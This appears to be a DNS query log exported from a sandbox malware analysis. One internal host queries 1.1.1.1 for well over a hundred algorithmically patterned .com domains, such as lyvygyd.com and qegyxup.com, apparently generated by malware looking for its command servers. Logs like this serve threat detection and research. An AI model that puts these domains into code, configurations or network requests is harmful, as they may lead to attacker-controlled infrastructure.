                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.174246073 CET192.168.2.61.1.1.10x5798Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.180671930 CET192.168.2.61.1.1.10x6919Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.182830095 CET192.168.2.61.1.1.10x3c2dStandard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.183408976 CET192.168.2.61.1.1.10x32feStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.185587883 CET192.168.2.61.1.1.10xd421Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.186707973 CET192.168.2.61.1.1.10xd62eStandard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.188913107 CET192.168.2.61.1.1.10x15efStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.189598083 CET192.168.2.61.1.1.10xddb3Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.192459106 CET192.168.2.61.1.1.10x4a14Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.192946911 CET192.168.2.61.1.1.10xb2faStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.195041895 CET192.168.2.61.1.1.10x9b91Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.203964949 CET192.168.2.61.1.1.10x3ac6Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.204746962 CET192.168.2.61.1.1.10x669Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.207344055 CET192.168.2.61.1.1.10xf61dStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232023001 CET192.168.2.61.1.1.10x9d65Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232357979 CET192.168.2.61.1.1.10x89e0Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.232690096 CET192.168.2.61.1.1.10xbd63Standard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.236362934 CET192.168.2.61.1.1.10x33b7Standard query (0)qegyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.237519026 CET192.168.2.61.1.1.10xb30eStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.241262913 CET192.168.2.61.1.1.10x5830Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.241573095 CET192.168.2.61.1.1.10x564cStandard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.242046118 CET192.168.2.61.1.1.10x9341Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.242275000 CET192.168.2.61.1.1.10x3f75Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.244188070 CET192.168.2.61.1.1.10xc338Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.245587111 CET192.168.2.61.1.1.10x652dStandard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.271682978 CET192.168.2.61.1.1.10xba7aStandard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272352934 CET192.168.2.61.1.1.10x114dStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272538900 CET192.168.2.61.1.1.10xb14fStandard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.272835016 CET192.168.2.61.1.1.10x37b5Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275162935 CET192.168.2.61.1.1.10xfbe0Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275434017 CET192.168.2.61.1.1.10xd312Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275670052 CET192.168.2.61.1.1.10xac26Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.275834084 CET192.168.2.61.1.1.10x667dStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.276570082 CET192.168.2.61.1.1.10x2ff4Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.284689903 CET192.168.2.61.1.1.10x62b9Standard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.287699938 CET192.168.2.61.1.1.10xf0d0Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.288305044 CET192.168.2.61.1.1.10xa8f2Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.288466930 CET192.168.2.61.1.1.10x353aStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289159060 CET192.168.2.61.1.1.10xa3c8Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289463997 CET192.168.2.61.1.1.10x39b1Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.289963007 CET192.168.2.61.1.1.10xf0bdStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290174007 CET192.168.2.61.1.1.10xfdeeStandard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290402889 CET192.168.2.61.1.1.10x656bStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290796041 CET192.168.2.61.1.1.10x1768Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.290833950 CET192.168.2.61.1.1.10x7336Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291461945 CET192.168.2.61.1.1.10x2ed1Standard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291909933 CET192.168.2.61.1.1.10x7d09Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.291954994 CET192.168.2.61.1.1.10x1c8cStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.292448044 CET192.168.2.61.1.1.10xbac1Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.304610014 CET192.168.2.61.1.1.10x9ab4Standard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.305512905 CET192.168.2.61.1.1.10x8efeStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.314147949 CET192.168.2.61.1.1.10x7cbaStandard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.319048882 CET192.168.2.61.1.1.10x380bStandard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.320292950 CET192.168.2.61.1.1.10xced0Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.323034048 CET192.168.2.61.1.1.10x917eStandard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.323292971 CET192.168.2.61.1.1.10xdd92Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.323503971 CET192.168.2.61.1.1.10xf03aStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.323684931 CET192.168.2.61.1.1.10x83aaStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.324126005 CET192.168.2.61.1.1.10x1292Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.324388027 CET192.168.2.61.1.1.10xbaacStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.335860014 CET192.168.2.61.1.1.10xd95eStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.336209059 CET192.168.2.61.1.1.10x1155Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.336580992 CET192.168.2.61.1.1.10xc6deStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.336729050 CET192.168.2.61.1.1.10xb783Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.340754986 CET192.168.2.61.1.1.10xa44fStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.344098091 CET192.168.2.61.1.1.10x7034Standard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.344291925 CET192.168.2.61.1.1.10xbb7fStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.348169088 CET192.168.2.61.1.1.10xafaaStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.352947950 CET192.168.2.61.1.1.10xdb8bStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.355020046 CET192.168.2.61.1.1.10x3f59Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357431889 CET192.168.2.61.1.1.10xfd4Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357810974 CET192.168.2.61.1.1.10x2cedStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357810974 CET192.168.2.61.1.1.10xfcb8Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.357960939 CET192.168.2.61.1.1.10xb763Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.360435009 CET192.168.2.61.1.1.10x5941Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.362837076 CET192.168.2.61.1.1.10xcbc9Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.362837076 CET192.168.2.61.1.1.10xa5f2Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.363410950 CET192.168.2.61.1.1.10xd3a2Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.364743948 CET192.168.2.61.1.1.10x2912Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.365075111 CET192.168.2.61.1.1.10xdf3eStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.366985083 CET192.168.2.61.1.1.10x9a26Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.368539095 CET192.168.2.61.1.1.10x9cf6Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.368700981 CET192.168.2.61.1.1.10xc313Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.369884014 CET192.168.2.61.1.1.10x26cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.370193005 CET192.168.2.61.1.1.10xeab5Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.370908976 CET192.168.2.61.1.1.10xeb4fStandard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.371943951 CET192.168.2.61.1.1.10x89b9Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.372678041 CET192.168.2.61.1.1.10xef20Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.374361038 CET192.168.2.61.1.1.10x5d6bStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.376610994 CET192.168.2.61.1.1.10x1a31Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.378982067 CET192.168.2.61.1.1.10x1f87Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.383774042 CET192.168.2.61.1.1.10xf180Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.434801102 CET192.168.2.61.1.1.10x68c3Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492309093 CET192.168.2.61.1.1.10x8b97Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492383957 CET192.168.2.61.1.1.10xe970Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492616892 CET192.168.2.61.1.1.10x8d45Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492616892 CET192.168.2.61.1.1.10x87cbStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492634058 CET192.168.2.61.1.1.10x30f7Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.492943048 CET192.168.2.61.1.1.10xbcfcStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.493241072 CET192.168.2.61.1.1.10xcfaaStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.551476955 CET192.168.2.61.1.1.10xe9f1Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:48.551964045 CET192.168.2.61.1.1.10xbd73Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.787251949 CET192.168.2.61.1.1.10xc8e7Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.787858009 CET192.168.2.61.1.1.10x9e61Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.790498972 CET192.168.2.61.1.1.10xacdaStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.920854092 CET192.168.2.61.1.1.10xf2f8Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.922207117 CET192.168.2.61.1.1.10xe588Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:51.926886082 CET192.168.2.61.1.1.10x6e59Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.057504892 CET192.168.2.61.1.1.10xc6eaStandard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.063374996 CET192.168.2.61.1.1.10xa29Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.165766954 CET192.168.2.61.1.1.10x856eStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.168313026 CET192.168.2.61.1.1.10x39Standard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.169126034 CET192.168.2.61.1.1.10xf23Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.170454979 CET192.168.2.61.1.1.10xf66aStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171200991 CET192.168.2.61.1.1.10xc112Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.171900034 CET192.168.2.61.1.1.10x8a9fStandard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.172735929 CET192.168.2.61.1.1.10x67a2Standard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.173531055 CET192.168.2.61.1.1.10xdec3Standard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174280882 CET192.168.2.61.1.1.10xb72eStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174395084 CET192.168.2.61.1.1.10x5d2Standard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.174810886 CET192.168.2.61.1.1.10xdd08Standard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176392078 CET192.168.2.61.1.1.10x4212Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.176793098 CET192.168.2.61.1.1.10xfff1Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.177299023 CET192.168.2.61.1.1.10xbe00Standard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.181627989 CET192.168.2.61.1.1.10xb5ecStandard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225616932 CET192.168.2.61.1.1.10xa625Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.225888968 CET192.168.2.61.1.1.10xb6fcStandard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226002932 CET192.168.2.61.1.1.10x3bedStandard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226181030 CET192.168.2.61.1.1.10x3493Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.226881981 CET192.168.2.61.1.1.10x236eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227183104 CET192.168.2.61.1.1.10x3893Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.227344990 CET192.168.2.61.1.1.10xb903Standard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228296995 CET192.168.2.61.1.1.10xb1c1Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228327036 CET192.168.2.61.1.1.10x82ccStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228461027 CET192.168.2.61.1.1.10x8563Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228517056 CET192.168.2.61.1.1.10xf27cStandard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228696108 CET192.168.2.61.1.1.10x5eafStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228718996 CET192.168.2.61.1.1.10xfddaStandard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.228851080 CET192.168.2.61.1.1.10x96c2Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260668039 CET192.168.2.61.1.1.10xca1aStandard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.260921001 CET192.168.2.61.1.1.10xe3a7Standard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261267900 CET192.168.2.61.1.1.10x52faStandard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.261545897 CET192.168.2.61.1.1.10x78d6Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262326002 CET192.168.2.61.1.1.10x2cb2Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262451887 CET192.168.2.61.1.1.10x8de5Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.262777090 CET192.168.2.61.1.1.10xccbdStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263106108 CET192.168.2.61.1.1.10x9faStandard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263403893 CET192.168.2.61.1.1.10x587bStandard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.263465881 CET192.168.2.61.1.1.10xd6acStandard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.294856071 CET192.168.2.61.1.1.10x300fStandard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295133114 CET192.168.2.61.1.1.10x7eedStandard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.295659065 CET192.168.2.61.1.1.10x426cStandard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296216965 CET192.168.2.61.1.1.10x42adStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.296726942 CET192.168.2.61.1.1.10xcfcbStandard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297211885 CET192.168.2.61.1.1.10x46ddStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.297929049 CET192.168.2.61.1.1.10xf124Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312156916 CET192.168.2.61.1.1.10xfb48Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312351942 CET192.168.2.61.1.1.10xaaa7Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.312582016 CET192.168.2.61.1.1.10xbca1Standard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403160095 CET192.168.2.61.1.1.10xf0cdStandard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:52.403238058 CET192.168.2.61.1.1.10xc154Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.151535988 CET192.168.2.61.1.1.10xa108Standard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.152921915 CET192.168.2.61.1.1.10x376bStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.158427954 CET192.168.2.61.1.1.10xc28aStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166302919 CET192.168.2.61.1.1.10xed8aStandard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.166543961 CET192.168.2.61.1.1.10x8528Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.172735929 CET192.168.2.61.1.1.10x351fStandard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.174266100 CET192.168.2.61.1.1.10x8f4fStandard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.177658081 CET192.168.2.61.1.1.10x5a7dStandard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.177833080 CET192.168.2.61.1.1.10x2122Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.181812048 CET192.168.2.61.1.1.10x8c70Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.186717033 CET192.168.2.61.1.1.10xe305Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.192011118 CET192.168.2.61.1.1.10xb3e4Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.193260908 CET192.168.2.61.1.1.10xeadfStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.194021940 CET192.168.2.61.1.1.10x608Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.194273949 CET192.168.2.61.1.1.10xd455Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.195256948 CET192.168.2.61.1.1.10xb195Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.195637941 CET192.168.2.61.1.1.10x5053Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.197156906 CET192.168.2.61.1.1.10xc838Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.205200911 CET192.168.2.61.1.1.10xbd65Standard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:58.205535889 CET192.168.2.61.1.1.10x91d2Standard query (0)vojybek.comA (IP address)IN (0x0001)false
